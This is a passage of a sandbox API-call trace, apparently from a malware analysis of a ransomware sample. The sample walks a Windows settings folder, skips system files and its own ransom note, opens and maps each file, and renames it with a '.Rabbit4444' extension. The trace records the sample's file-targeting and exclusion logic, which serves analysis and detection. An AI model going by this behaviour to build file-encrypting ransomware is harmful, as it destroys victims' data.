dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.344] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.344] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14865451029) returned 1 [0057.344] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0057.344] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0057.344] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.344] CloseHandle (hObject=0x298) returned 1 [0057.344] CloseHandle (hObject=0x278) returned 1 [0057.344] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms.Rabbit4444") returned 197 [0057.344] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_fourfingertapenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_FourFingerTapEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_fourfingertapenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.345] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29504025, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x29504025, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2339a047, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x500, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms", cAlternateFileName="AA5689~1.SET")) returned 1 [0057.345] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.345] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.345] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.345] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms", lpString2=".") returned 1 [0057.345] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms", lpString2="..") returned 1 [0057.345] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms", lpString2="windows") returned -1 [0057.345] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.345] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.345] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms", lpString2="boot") returned -1 [0057.345] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.346] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.346] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms" [0057.346] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.346] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms") returned 65 [0057.346] lstrlenW (lpString="Rabbit4444") returned 10 [0057.346] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.346] lstrlenW (lpString=".dll") returned 4 [0057.346] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.346] lstrlenW (lpString=".lnk") returned 4 [0057.346] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.346] lstrlenW (lpString=".ini") returned 4 [0057.346] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.346] lstrlenW (lpString=".sys") returned 4 [0057.346] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.346] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_leaveonwithmouse.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.346] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.346] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14865722290) returned 1 [0057.347] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1280) returned 1 [0057.347] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0057.347] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0057.347] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x298 [0057.348] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x70000 [0057.348] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.348] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0057.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0057.349] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14865967947) returned 1 [0057.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0057.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0057.349] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.349] CloseHandle (hObject=0x298) returned 1 [0057.349] CloseHandle (hObject=0x278) returned 1 [0057.349] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms.Rabbit4444") returned 193 [0057.349] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_leaveonwithmouse.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_LeaveOnWithMouse.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_leaveonwithmouse.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.350] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2965b54f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2965b54f, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms", cAlternateFileName="AA25A5~1.SET")) returned 1 [0057.350] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.350] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.350] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.350] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.350] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.350] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.350] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.350] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.350] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.350] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.350] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.350] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms" [0057.350] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.351] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms") returned 59 [0057.351] lstrlenW (lpString="Rabbit4444") returned 10 [0057.351] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.351] lstrlenW (lpString=".dll") returned 4 [0057.351] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.351] lstrlenW (lpString=".lnk") returned 4 [0057.351] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.351] lstrlenW (lpString=".ini") returned 4 [0057.351] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.351] lstrlenW (lpString=".sys") returned 4 [0057.351] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.351] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_panenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.351] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.351] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14866208450) returned 1 [0057.351] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1250) returned 1 [0057.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0057.351] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0057.352] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.353] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.353] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.353] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0057.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.354] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0057.354] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14866470600) returned 1 [0057.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0057.354] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0057.354] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.354] CloseHandle (hObject=0x298) returned 1 [0057.354] CloseHandle (hObject=0x278) returned 1 [0057.354] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms.Rabbit4444") returned 187 [0057.354] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_panenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_PanEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_panenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.355] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29897905, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x29897905, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x519, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms", cAlternateFileName="AAA6F5~1.SET")) returned 1 [0057.355] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.355] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.355] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.355] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.355] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.355] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.355] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.355] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.355] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.355] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.355] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.355] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms" [0057.355] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.356] lstrlenW (lpString="AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms") returned 70 [0057.356] lstrlenW (lpString="Rabbit4444") returned 10 [0057.356] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.356] lstrlenW (lpString=".dll") returned 4 [0057.356] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.356] lstrlenW (lpString=".lnk") returned 4 [0057.356] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.356] lstrlenW (lpString=".ini") returned 4 [0057.356] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.356] lstrlenW (lpString=".sys") returned 4 [0057.356] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.356] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_rightclickzoneenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.356] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.356] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14866711495) returned 1 [0057.356] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1305) returned 1 [0057.356] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117770 [0057.356] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0057.357] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x820, lpName=0x0) returned 0x298 [0057.358] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x820) returned 0x70000 [0057.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.359] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14866946634) returned 1 [0057.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117770 | out: hHeap=0xe0000) returned 1 [0057.359] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0057.359] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.359] CloseHandle (hObject=0x298) returned 1 [0057.359] CloseHandle (hObject=0x278) returned 1 [0057.359] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms.Rabbit4444") returned 198 [0057.359] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_rightclickzoneenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Input_Touch_RightClickZoneEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_input_touch_rightclickzoneenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.360] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a568314, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x2a568314, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x238f74d9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x514, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms", cAlternateFileName="AA4412~1.SET")) returned 1 [0057.360] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.360] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.360] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.360] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms", lpString2=".") returned 1 [0057.360] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms", lpString2="..") returned 1 [0057.360] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms", lpString2="windows") returned -1 [0057.360] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.360] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.360] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms", lpString2="boot") returned -1 [0057.360] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.360] lstrcmpiW (lpString1="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.360] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms") returned="AAA_SystemSettings_Input_Touch_SetActivationTimeout.settingcontent-ms" 